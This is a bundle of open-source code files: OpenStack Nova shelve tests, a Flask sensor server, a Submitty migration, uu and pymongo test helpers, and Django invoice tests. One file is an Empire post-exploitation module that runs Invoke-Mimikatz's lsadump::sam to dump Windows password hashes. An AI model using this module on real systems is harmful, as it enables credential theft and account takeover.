self.controller = self.plugin.ShelveController()
self.req = fakes.HTTPRequest.blank('')
def test_shelve_restricted_by_role(self):
rules = {'compute_extension:%sshelve' % self.prefix:
common_policy.parse_rule('role:admin')}
policy.set_rules(rules)
self.assertRaises(exception.Forbidden, self.controller._shelve,
self.req, str(uuid.uuid4()), {})
def test_shelve_allowed(self):
rules = {'compute:get': common_policy.parse_rule(''),
'compute_extension:%sshelve' % self.prefix:
common_policy.parse_rule('')}
policy.set_rules(rules)
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.assertRaises(exception.Forbidden, self.controller._shelve,
self.req, str(uuid.uuid4()), {})
def test_shelve_locked_server(self):
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.stubs.Set(self.plugin, 'auth_shelve', fake_auth_context)
self.stubs.Set(compute_api.API, 'shelve',
fakes.fake_actions_to_locked_server)
self.assertRaises(webob.exc.HTTPConflict, self.controller._shelve,
self.req, str(uuid.uuid4()), {})
def test_unshelve_restricted_by_role(self):
rules = {'compute_extension:%sunshelve' % self.prefix:
common_policy.parse_rule('role:admin')}
policy.set_rules(rules)
self.assertRaises(exception.Forbidden, self.controller._unshelve,
self.req, str(uuid.uuid4()), {})
def test_unshelve_allowed(self):
rules = {'compute:get': common_policy.parse_rule(''),
'compute_extension:%sunshelve' % self.prefix:
common_policy.parse_rule('')}
policy.set_rules(rules)
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.assertRaises(exception.Forbidden, self.controller._unshelve,
self.req, str(uuid.uuid4()), {})
def test_unshelve_locked_server(self):
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.stubs.Set(self.plugin, 'auth_unshelve', fake_auth_context)
self.stubs.Set(compute_api.API, 'unshelve',
fakes.fake_actions_to_locked_server)
self.assertRaises(webob.exc.HTTPConflict, self.controller._unshelve,
self.req, str(uuid.uuid4()), {})
def test_shelve_offload_restricted_by_role(self):
rules = {'compute_extension:%s%s' % (self.prefix, self.offload):
common_policy.parse_rule('role:admin')}
policy.set_rules(rules)
self.assertRaises(exception.Forbidden,
self.controller._shelve_offload, self.req,
str(uuid.uuid4()), {})
def test_shelve_offload_allowed(self):
rules = {'compute:get': common_policy.parse_rule(''),
'compute_extension:%s%s' % (self.prefix, self.offload):
common_policy.parse_rule('')}
policy.set_rules(rules)
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.assertRaises(exception.Forbidden,
self.controller._shelve_offload,
self.req, str(uuid.uuid4()), {})
def test_shelve_offload_locked_server(self):
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.stubs.Set(self.plugin, 'auth_shelve_offload', fake_auth_context)
self.stubs.Set(compute_api.API, 'shelve_offload',
fakes.fake_actions_to_locked_server)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._shelve_offload,
self.req, str(uuid.uuid4()), {})
class ShelvePolicyTestV2(ShelvePolicyTestV21):
plugin = shelve_v2
prefix = ''
offload = 'shelveOffload'
|
{
"content_hash": "b0ca4f83577c43d7a3f97fef1d859f01",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 77,
"avg_line_length": 40.368852459016395,
"alnum_prop": 0.6235532994923858,
"repo_name": "affo/nova",
"id": "ce5760fef1c3be4889c7a34ad3e1c1c80573de29",
"size": "5523",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nova/tests/unit/api/openstack/compute/contrib/test_shelve.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "3223"
},
{
"name": "Python",
"bytes": "15659662"
},
{
"name": "Shell",
"bytes": "20716"
}
],
"symlink_target": ""
}
|
import config
from flask import Flask, render_template, send_from_directory, jsonify, request
from datetime import datetime, timedelta
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from models import TemperatureMeasurement
app = Flask(__name__)
# Set up the DB
engine = create_engine(config.DB_STRING, echo=True)
Session = sessionmaker(bind=engine)
session = Session()
@app.route("/")
def start():
return render_template('index.html')
@app.route('/get_data')
def get_data():
start = request.args.get('start', None, type=str)
end = request.args.get('end', None, type=str)
# Last X days
days = request.args.get('d', None, type=str)
if start and end:
print(start, end, type(start))
q = session.query(TemperatureMeasurement).filter(
TemperatureMeasurement.moment.between(start, end)
).all()
elif days:
days_ago = datetime.now() - timedelta(days=int(days))
from_date = str(days_ago.date())
q = session.query(TemperatureMeasurement).filter(
TemperatureMeasurement.moment >= from_date
).all()
else:
q = session.query(TemperatureMeasurement).all()
data = [i.as_dict() for i in q]
return jsonify(items=data)
# return "asd"
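# Example requests against /get_data (illustrative; parameter names taken from
# the handler above):
#
#     GET /get_data                                   -> every measurement
#     GET /get_data?d=7                               -> last 7 days
#     GET /get_data?start=2017-01-01&end=2017-01-31   -> explicit date range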
@app.route('/js/<path:path>')
def send_js(path):
return send_from_directory('/home/pi/raspy/server/js/', path)
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0')
|
{
"content_hash": "42ab5f87f01f875e8bcb0a8b280b347e",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 79,
"avg_line_length": 28.80392156862745,
"alnum_prop": 0.6589516678012253,
"repo_name": "ganiserb/raspy",
"id": "91437b98b3dddd91db3d71a9100fe302d1b9c803",
"size": "1484",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "587"
},
{
"name": "JavaScript",
"bytes": "825"
},
{
"name": "Python",
"bytes": "4161"
},
{
"name": "Shell",
"bytes": "352"
}
],
"symlink_target": ""
}
|
"""Migration for a given Submitty course database."""
def up(config, database, semester, course):
"""
Run up migration.
:param config: Object holding configuration details about Submitty
:type config: migrator.config.Config
:param database: Object for interacting with given database for environment
:type database: migrator.db.Database
:param semester: Semester of the course being migrated
:type semester: str
:param course: Code of course being migrated
:type course: str
"""
database.execute("ALTER TABLE lichen ADD COLUMN IF NOT EXISTS other_gradeable_paths TEXT;")
def down(config, database, semester, course):
"""
Run down migration (rollback).
:param config: Object holding configuration details about Submitty
:type config: migrator.config.Config
:param database: Object for interacting with given database for environment
:type database: migrator.db.Database
:param semester: Semester of the course being migrated
:type semester: str
:param course: Code of course being migrated
:type course: str
"""
pass
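# Note (illustrative only, not executed): a symmetric rollback for up() would be
#
#     database.execute(
#         "ALTER TABLE lichen DROP COLUMN IF EXISTS other_gradeable_paths;")
#
# down() is left as a no-op here, so the added column is preserved on rollback.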
|
{
"content_hash": "af032c2b8c5e195501c5e195af516a6f",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 95,
"avg_line_length": 33.878787878787875,
"alnum_prop": 0.7191413237924866,
"repo_name": "Submitty/Submitty",
"id": "c1586c9f36341587844be99c2e2e3a9856ce4f78",
"size": "1118",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "migration/migrator/migrations/course/20211103234638_plagiarism_arbitrary_paths.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8450"
},
{
"name": "C++",
"bytes": "496998"
},
{
"name": "CMake",
"bytes": "1561"
},
{
"name": "CSS",
"bytes": "210295"
},
{
"name": "HTML",
"bytes": "799796"
},
{
"name": "Java",
"bytes": "3828"
},
{
"name": "JavaScript",
"bytes": "981630"
},
{
"name": "PHP",
"bytes": "3103857"
},
{
"name": "PLpgSQL",
"bytes": "122825"
},
{
"name": "Python",
"bytes": "1589891"
},
{
"name": "Shell",
"bytes": "205161"
},
{
"name": "TeX",
"bytes": "21960"
},
{
"name": "Twig",
"bytes": "1239136"
},
{
"name": "TypeScript",
"bytes": "17328"
}
],
"symlink_target": ""
}
|
"""
Tests for uu module.
Nick Mathewson
"""
import unittest
from test import support
import os
import stat
import sys
import uu
import io
plaintext = b"The symbols on top of your keyboard are !@#$%^&*()_+|~\n"
encodedtext = b"""\
M5&AE('-Y;6)O;',@;VX@=&]P(&]F('EO=7(@:V5Y8F]A<F0@87)E("% (R0E
*7B8J*"E?*WQ^"@ """
# Stolen from io.py
class FakeIO(io.TextIOWrapper):
"""Text I/O implementation using an in-memory buffer.
    Can be used as a drop-in replacement for sys.stdin and sys.stdout.
"""
# XXX This is really slow, but fully functional
def __init__(self, initial_value="", encoding="utf-8",
errors="strict", newline="\n"):
super(FakeIO, self).__init__(io.BytesIO(),
encoding=encoding,
errors=errors,
newline=newline)
self._encoding = encoding
self._errors = errors
if initial_value:
if not isinstance(initial_value, str):
initial_value = str(initial_value)
self.write(initial_value)
self.seek(0)
def getvalue(self):
self.flush()
return self.buffer.getvalue().decode(self._encoding, self._errors)
def encodedtextwrapped(mode, filename, backtick=False):
if backtick:
res = (bytes("begin %03o %s\n" % (mode, filename), "ascii") +
encodedtext.replace(b' ', b'`') + b"\n`\nend\n")
else:
res = (bytes("begin %03o %s\n" % (mode, filename), "ascii") +
encodedtext + b"\n \nend\n")
return res
class UUTest(unittest.TestCase):
def test_encode(self):
inp = io.BytesIO(plaintext)
out = io.BytesIO()
uu.encode(inp, out, "t1")
self.assertEqual(out.getvalue(), encodedtextwrapped(0o666, "t1"))
inp = io.BytesIO(plaintext)
out = io.BytesIO()
uu.encode(inp, out, "t1", 0o644)
self.assertEqual(out.getvalue(), encodedtextwrapped(0o644, "t1"))
inp = io.BytesIO(plaintext)
out = io.BytesIO()
uu.encode(inp, out, "t1", backtick=True)
self.assertEqual(out.getvalue(), encodedtextwrapped(0o666, "t1", True))
with self.assertRaises(TypeError):
uu.encode(inp, out, "t1", 0o644, True)
def test_decode(self):
for backtick in True, False:
inp = io.BytesIO(encodedtextwrapped(0o666, "t1", backtick=backtick))
out = io.BytesIO()
uu.decode(inp, out)
self.assertEqual(out.getvalue(), plaintext)
inp = io.BytesIO(
b"UUencoded files may contain many lines,\n" +
b"even some that have 'begin' in them.\n" +
encodedtextwrapped(0o666, "t1", backtick=backtick)
)
out = io.BytesIO()
uu.decode(inp, out)
self.assertEqual(out.getvalue(), plaintext)
def test_truncatedinput(self):
inp = io.BytesIO(b"begin 644 t1\n" + encodedtext)
out = io.BytesIO()
try:
uu.decode(inp, out)
self.fail("No exception raised")
except uu.Error as e:
self.assertEqual(str(e), "Truncated input file")
def test_missingbegin(self):
inp = io.BytesIO(b"")
out = io.BytesIO()
try:
uu.decode(inp, out)
self.fail("No exception raised")
except uu.Error as e:
self.assertEqual(str(e), "No valid begin line found in input file")
def test_garbage_padding(self):
# Issue #22406
encodedtext1 = (
b"begin 644 file\n"
# length 1; bits 001100 111111 111111 111111
b"\x21\x2C\x5F\x5F\x5F\n"
b"\x20\n"
b"end\n"
)
encodedtext2 = (
b"begin 644 file\n"
# length 1; bits 001100 111111 111111 111111
b"\x21\x2C\x5F\x5F\x5F\n"
b"\x60\n"
b"end\n"
)
plaintext = b"\x33" # 00110011
for encodedtext in encodedtext1, encodedtext2:
with self.subTest("uu.decode()"):
inp = io.BytesIO(encodedtext)
out = io.BytesIO()
uu.decode(inp, out, quiet=True)
self.assertEqual(out.getvalue(), plaintext)
with self.subTest("uu_codec"):
import codecs
decoded = codecs.decode(encodedtext, "uu_codec")
self.assertEqual(decoded, plaintext)
class UUStdIOTest(unittest.TestCase):
def setUp(self):
self.stdin = sys.stdin
self.stdout = sys.stdout
def tearDown(self):
sys.stdin = self.stdin
sys.stdout = self.stdout
def test_encode(self):
sys.stdin = FakeIO(plaintext.decode("ascii"))
sys.stdout = FakeIO()
uu.encode("-", "-", "t1", 0o666)
self.assertEqual(sys.stdout.getvalue(),
encodedtextwrapped(0o666, "t1").decode("ascii"))
def test_decode(self):
sys.stdin = FakeIO(encodedtextwrapped(0o666, "t1").decode("ascii"))
sys.stdout = FakeIO()
uu.decode("-", "-")
stdout = sys.stdout
sys.stdout = self.stdout
sys.stdin = self.stdin
self.assertEqual(stdout.getvalue(), plaintext.decode("ascii"))
class UUFileTest(unittest.TestCase):
def setUp(self):
self.tmpin = support.TESTFN + "i"
self.tmpout = support.TESTFN + "o"
self.addCleanup(support.unlink, self.tmpin)
self.addCleanup(support.unlink, self.tmpout)
def test_encode(self):
with open(self.tmpin, 'wb') as fin:
fin.write(plaintext)
with open(self.tmpin, 'rb') as fin:
with open(self.tmpout, 'wb') as fout:
uu.encode(fin, fout, self.tmpin, mode=0o644)
with open(self.tmpout, 'rb') as fout:
s = fout.read()
self.assertEqual(s, encodedtextwrapped(0o644, self.tmpin))
# in_file and out_file as filenames
uu.encode(self.tmpin, self.tmpout, self.tmpin, mode=0o644)
with open(self.tmpout, 'rb') as fout:
s = fout.read()
self.assertEqual(s, encodedtextwrapped(0o644, self.tmpin))
def test_decode(self):
with open(self.tmpin, 'wb') as f:
f.write(encodedtextwrapped(0o644, self.tmpout))
with open(self.tmpin, 'rb') as f:
uu.decode(f)
with open(self.tmpout, 'rb') as f:
s = f.read()
self.assertEqual(s, plaintext)
# XXX is there an xp way to verify the mode?
def test_decode_filename(self):
with open(self.tmpin, 'wb') as f:
f.write(encodedtextwrapped(0o644, self.tmpout))
uu.decode(self.tmpin)
with open(self.tmpout, 'rb') as f:
s = f.read()
self.assertEqual(s, plaintext)
def test_decodetwice(self):
# Verify that decode() will refuse to overwrite an existing file
with open(self.tmpin, 'wb') as f:
f.write(encodedtextwrapped(0o644, self.tmpout))
with open(self.tmpin, 'rb') as f:
uu.decode(f)
with open(self.tmpin, 'rb') as f:
self.assertRaises(uu.Error, uu.decode, f)
def test_decode_mode(self):
# Verify that decode() will set the given mode for the out_file
expected_mode = 0o444
with open(self.tmpin, 'wb') as f:
f.write(encodedtextwrapped(expected_mode, self.tmpout))
# make file writable again, so it can be removed (Windows only)
self.addCleanup(os.chmod, self.tmpout, expected_mode | stat.S_IWRITE)
with open(self.tmpin, 'rb') as f:
uu.decode(f)
self.assertEqual(
stat.S_IMODE(os.stat(self.tmpout).st_mode),
expected_mode
)
if __name__=="__main__":
unittest.main()
|
{
"content_hash": "7df45e18d93bebbc8a4af907b739b33c",
"timestamp": "",
"source": "github",
"line_count": 242,
"max_line_length": 80,
"avg_line_length": 32.52066115702479,
"alnum_prop": 0.559720457433291,
"repo_name": "kikocorreoso/brython",
"id": "c9f05e5b760d922cfaddf4a509d2fbc317b8b97f",
"size": "7870",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "www/src/Lib/test/test_uu.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "21158"
},
{
"name": "HTML",
"bytes": "5011615"
},
{
"name": "JavaScript",
"bytes": "7230101"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "19224768"
},
{
"name": "Roff",
"bytes": "21126"
},
{
"name": "VBScript",
"bytes": "481"
}
],
"symlink_target": ""
}
|
import random
import traceback
import datetime
import re
import sys
sys.path[0:0] = [""]
from bson.binary import Binary
from bson.dbref import DBRef
from bson.objectid import ObjectId
from bson.son import SON
gen_target = 100
reduction_attempts = 10
examples = 5
def lift(value):
return lambda: value
def choose_lifted(generator_list):
return lambda: random.choice(generator_list)
def map(generator, function):
return lambda: function(generator())
def choose(list):
return lambda: random.choice(list)()
def gen_range(start, stop):
return lambda: random.randint(start, stop)
def gen_int():
max_int = 2147483647
return lambda: random.randint(-max_int - 1, max_int)
def gen_float():
return lambda: (random.random() - 0.5) * sys.maxint
def gen_boolean():
return lambda: random.choice([True, False])
def gen_printable_char():
return lambda: chr(random.randint(32, 126))
def gen_printable_string(gen_length):
return lambda: "".join(gen_list(gen_printable_char(), gen_length)())
def gen_char(set=None):
return lambda: chr(random.randint(0, 255))
def gen_string(gen_length):
return lambda: "".join(gen_list(gen_char(), gen_length)())
def gen_unichar():
return lambda: unichr(random.randint(1, 0xFFF))
def gen_unicode(gen_length):
return lambda: u"".join([x for x in
gen_list(gen_unichar(), gen_length)() if
x not in ".$"])
def gen_list(generator, gen_length):
return lambda: [generator() for _ in range(gen_length())]
def gen_datetime():
return lambda: datetime.datetime(random.randint(1970, 2037),
random.randint(1, 12),
random.randint(1, 28),
random.randint(0, 23),
random.randint(0, 59),
random.randint(0, 59),
random.randint(0, 999) * 1000)
def gen_dict(gen_key, gen_value, gen_length):
def a_dict(gen_key, gen_value, length):
result = {}
for _ in range(length):
result[gen_key()] = gen_value()
return result
return lambda: a_dict(gen_key, gen_value, gen_length())
def gen_regexp(gen_length):
# TODO our patterns only consist of one letter.
# this is because of a bug in CPython's regex equality testing,
# which I haven't quite tracked down, so I'm just ignoring it...
pattern = lambda: u"".join(gen_list(choose_lifted(u"a"), gen_length)())
def gen_flags():
flags = 0
if random.random() > 0.5:
flags = flags | re.IGNORECASE
if random.random() > 0.5:
flags = flags | re.MULTILINE
if random.random() > 0.5:
flags = flags | re.VERBOSE
return flags
return lambda: re.compile(pattern(), gen_flags())
def gen_objectid():
return lambda: ObjectId()
def gen_dbref():
collection = gen_unicode(gen_range(0, 20))
return lambda: DBRef(collection(), gen_mongo_value(1, True)())
def gen_mongo_value(depth, ref):
choices = [gen_unicode(gen_range(0, 50)),
gen_printable_string(gen_range(0, 50)),
map(gen_string(gen_range(0, 1000)), Binary),
gen_int(),
gen_float(),
gen_boolean(),
gen_datetime(),
gen_objectid(),
lift(None)]
if ref:
choices.append(gen_dbref())
if depth > 0:
choices.append(gen_mongo_list(depth, ref))
choices.append(gen_mongo_dict(depth, ref))
return choose(choices)
def gen_mongo_list(depth, ref):
return gen_list(gen_mongo_value(depth - 1, ref), gen_range(0, 10))
def gen_mongo_dict(depth, ref=True):
return map(gen_dict(gen_unicode(gen_range(0, 20)),
gen_mongo_value(depth - 1, ref),
gen_range(0, 10)), SON)
def simplify(case): # TODO this is a hack
if isinstance(case, SON) and "$ref" not in case:
simplified = SON(case) # make a copy!
if random.choice([True, False]):
# delete
if not len(simplified.keys()):
return (False, case)
del simplified[random.choice(simplified.keys())]
return (True, simplified)
else:
# simplify a value
if not len(simplified.items()):
return (False, case)
(key, value) = random.choice(simplified.items())
(success, value) = simplify(value)
simplified[key] = value
return (success, success and simplified or case)
if isinstance(case, list):
simplified = list(case)
if random.choice([True, False]):
# delete
if not len(simplified):
return (False, case)
simplified.pop(random.randrange(len(simplified)))
return (True, simplified)
else:
# simplify an item
if not len(simplified):
return (False, case)
index = random.randrange(len(simplified))
(success, value) = simplify(simplified[index])
simplified[index] = value
return (success, success and simplified or case)
return (False, case)
def reduce(case, predicate, reductions=0):
for _ in range(reduction_attempts):
(reduced, simplified) = simplify(case)
if reduced and not predicate(simplified):
return reduce(simplified, predicate, reductions + 1)
return (reductions, case)
def isnt(predicate):
return lambda x: not predicate(x)
def check(predicate, generator):
counter_examples = []
for _ in range(gen_target):
case = generator()
try:
if not predicate(case):
reduction = reduce(case, predicate)
counter_examples.append("after %s reductions: %r" % reduction)
except:
counter_examples.append("%r : %s" % (case, traceback.format_exc()))
return counter_examples
def check_unittest(test, predicate, generator):
counter_examples = check(predicate, generator)
if counter_examples:
failures = len(counter_examples)
message = "\n".join([" -> %s" % f for f in
counter_examples[:examples]])
message = ("found %d counter examples, displaying first %d:\n%s" %
(failures, min(failures, examples), message))
test.fail(message)
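# --- illustrative usage sketch (not part of the original qcheck API) ---
# A hedged example of driving the harness directly: generate nested SON
# documents with the generators above and assert a trivial invariant over
# them; the predicate below is invented purely for illustration.
def _example_check_string_keys():
    def all_keys_are_text(doc):
        return all(isinstance(key, basestring) for key in doc.keys())
    # check() returns a list of counter examples; an empty list means the
    # property held for every generated case.
    return check(all_keys_are_text, gen_mongo_dict(2))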
|
{
"content_hash": "4e95c97c1be2b24ca237e00e7067251a",
"timestamp": "",
"source": "github",
"line_count": 226,
"max_line_length": 79,
"avg_line_length": 29.013274336283185,
"alnum_prop": 0.5758731127039804,
"repo_name": "marcosleonefilho/hoop-pymongo",
"id": "b653f10df98bdbdd77cd0f938898f8cc46d752f4",
"size": "7134",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "test/qcheck.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "100460"
},
{
"name": "Python",
"bytes": "492907"
},
{
"name": "Shell",
"bytes": "3073"
}
],
"symlink_target": ""
}
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz SAM dump',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract hashes from the Security Account Managers "
"(SAM) database."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com',
"https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa"
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
script += "Invoke-Mimikatz -Command "
script += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
return script
|
{
"content_hash": "a0046b792ae01adb8e5d5be009c7d34c",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 104,
"avg_line_length": 29.493333333333332,
"alnum_prop": 0.5022603978300181,
"repo_name": "rvazarkar/Empire",
"id": "45773d89f79f1fbe36e5070315cb50e69a18d6c4",
"size": "2212",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/modules/credentials/mimikatz/sam.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "PHP",
"bytes": "2563"
},
{
"name": "PowerShell",
"bytes": "4057571"
},
{
"name": "Python",
"bytes": "640506"
},
{
"name": "Shell",
"bytes": "977"
}
],
"symlink_target": ""
}
|
import datetime
from dateutil.relativedelta import relativedelta
import random
from six.moves.urllib.parse import urlencode
from django.contrib.auth.models import Permission
from django.core.urlresolvers import reverse
from django.test import TestCase
from timepiece import utils
from timepiece.forms import DATE_FORM_FORMAT
from timepiece.tests import factories
from timepiece.tests.base import ViewTestMixin, LogTimeMixin
from timepiece.contracts.models import EntryGroup, HourGroup
from timepiece.crm.models import Attribute
from timepiece.entries.models import Activity, Entry
class TestListInvoicesView(ViewTestMixin, TestCase):
url_name = 'list_invoices'
template_name = 'timepiece/invoice/list.html'
factory = factories.EntryGroup
model = EntryGroup
def setUp(self):
super(TestListInvoicesView, self).setUp()
self.permissions = [Permission.objects.get(codename='add_entrygroup')]
self.user = factories.User(permissions=self.permissions)
self.login_user(self.user)
def test_get_no_permission(self):
"""Permission is required for this view."""
self.user.user_permissions.clear()
response = self._get()
self.assertRedirectsToLogin(response)
def test_list_all(self):
"""If no filters are provided, all objects should be listed."""
object_list = [self.factory.create() for i in range(3)]
response = self._get()
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 3)
for obj in object_list:
self.assertTrue(obj in response.context['object_list'])
def test_list_one(self):
"""Page should render if there is one object & no search query."""
obj = self.factory.create()
response = self._get()
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 1)
self.assertEquals(response.context['object_list'].get(), obj)
def test_no_results(self):
"""Page should render if there are no search results."""
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 0)
def test_one_result(self):
"""Page should render if there is only one search result."""
obj = self.factory.create(comments='hello')
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 1)
self.assertEquals(response.context['object_list'].get(), obj)
def test_multiple_results(self):
"""Page should render if there are multiple search results."""
obj_list = [self.factory.create(comments='hello') for i in range(2)]
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, self.template_name)
self.assertEquals(response.context['object_list'].count(), 2)
for obj in obj_list:
self.assertTrue(obj in response.context['object_list'])
def test_filter_number(self):
"""User should be able to filter by search query."""
obj = self.factory.create(number='hello')
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertEquals(response.context['object_list'].get(), obj)
def test_filter_comments(self):
"""User should be able to filter by search query."""
obj = self.factory.create(comments='hello')
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertEquals(response.context['object_list'].get(), obj)
def test_filter_project_name(self):
"""User should be able to filter by search query."""
obj = self.factory.create(project__name='hello')
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertEquals(response.context['object_list'].get(), obj)
def test_filter_user_username(self):
"""User should be able to filter by search query."""
obj = self.factory.create(user__username='hello')
self.factory.create()
response = self._get(get_kwargs={'search': 'hello'})
self.assertEquals(response.status_code, 200)
self.assertEquals(response.context['object_list'].get(), obj)
class InvoiceViewPreviousTestCase(ViewTestMixin, LogTimeMixin, TestCase):
def setUp(self):
super(InvoiceViewPreviousTestCase, self).setUp()
self.user = factories.Superuser()
self.login_user(self.user)
self.devl_activity = factories.Activity(
code='devl', name='development', billable=True)
self.activity = factories.Activity(
code='WRK', name='Work')
# Make some projects and entries for invoice creation
self.project = factories.BillableProject()
self.project2 = factories.BillableProject()
last_start = self.log_many([self.project, self.project2])
# Add some non-billable entries
self.log_many([self.project, self.project2], start=last_start,
billable=False)
        self.create_invoice(self.project, {'status': EntryGroup.INVOICED})
self.create_invoice(self.project2, {'status': EntryGroup.NOT_INVOICED})
def get_create_url(self, **kwargs):
base_url = reverse('create_invoice')
params = urlencode(kwargs)
return '{0}?{1}'.format(base_url, params)
def log_many(self, projects, num_entries=20, start=None, billable=True):
start = utils.add_timezone(datetime.datetime(2011, 1, 1, 0, 0, 0))
for index in range(0, num_entries):
start += relativedelta(hours=(5 * index))
project = projects[index % len(projects)] # Alternate projects
self.log_time(start=start, status=Entry.APPROVED, project=project,
billable=billable)
return start
def create_invoice(self, project=None, data=None):
data = data or {}
if not project:
project = self.project
to_date = utils.add_timezone(datetime.datetime(2011, 1, 31))
url = self.get_create_url(project=project.id, to_date=to_date.strftime('%Y-%m-%d'))
params = {
'number': str(random.randint(999, 9999)),
'status': EntryGroup.INVOICED,
}
params.update(data)
self.client.post(url, params)
def get_invoice(self):
invoices = EntryGroup.objects.all()
return random.choice(invoices)
def get_entry(self, invoice):
entries = invoice.entries.all()
return random.choice(entries)
def test_previous_invoice_list_no_search(self):
url = reverse('list_invoices')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
invoices = response.context['object_list']
self.assertEqual(len(invoices), 2)
def test_previous_invoice_list_search(self):
def search(query):
response = self.client.get(list_url, data={'search': query})
return response.context['object_list']
list_url = reverse('list_invoices')
project3 = factories.BillableProject(name=':-D')
self.log_many([project3], 10)
self.create_invoice(project=project3, data={
'status': EntryGroup.INVOICED,
'comments': 'comment!',
'number': '###',
})
# Search comments, project name, and number.
for query in ['comment!', ':-D', '###']:
results = search(query)
self.assertEqual(len(results), 1)
self.assertEqual(results[0].project, project3)
# Search in username
results = search(self.user.username)
self.assertEqual(len(results), 3) # all were created by this user
# No results
results = search("You won't find me here")
self.assertEquals(len(results), 0)
def test_invoice_detail(self):
invoices = EntryGroup.objects.all()
for invoice in invoices:
url = reverse('view_invoice', args=[invoice.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTrue(response.context['invoice'])
def test_invoice_csv(self):
invoice = self.get_invoice()
url = reverse('view_invoice_csv', args=[invoice.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
data = dict(response.items())
self.assertEqual(data['Content-Type'], 'text/csv')
disposition = data['Content-Disposition']
self.assertTrue(disposition.startswith('attachment; filename=Invoice'))
contents = response.content.decode('utf-8').splitlines()
# TODO: Possibly find a meaningful way to test contents
# Pull off header line and totals line
contents.pop(0) # header
contents.pop() # totals
num_entries = invoice.entries.all().count()
self.assertEqual(num_entries, len(contents))
def test_invoice_csv_bad_id(self):
url = reverse('view_invoice_csv', args=[9999999999])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_invoice_edit_get(self):
invoice = self.get_invoice()
url = reverse('edit_invoice', args=[invoice.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['invoice'].id, invoice.id)
self.assertTrue(response.context['entries'])
def test_invoice_edit_bad_id(self):
url = reverse('edit_invoice', args=[99999999999])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_invoice_edit_post(self):
invoice = self.get_invoice()
url = reverse('edit_invoice', args=(invoice.id,))
if invoice.status != EntryGroup.INVOICED:
status = EntryGroup.INVOICED
else:
status = EntryGroup.NOT_INVOICED
params = {
'number': int(invoice.number) + 1,
'status': status,
'comments': 'Comments',
}
response = self.client.post(url, params)
self.assertEqual(response.status_code, 302)
new_invoice = EntryGroup.objects.get(pk=invoice.id)
self.assertEqual(int(invoice.number) + 1, int(new_invoice.number))
self.assertTrue(invoice.status != new_invoice.status)
self.assertEqual(new_invoice.comments, 'Comments')
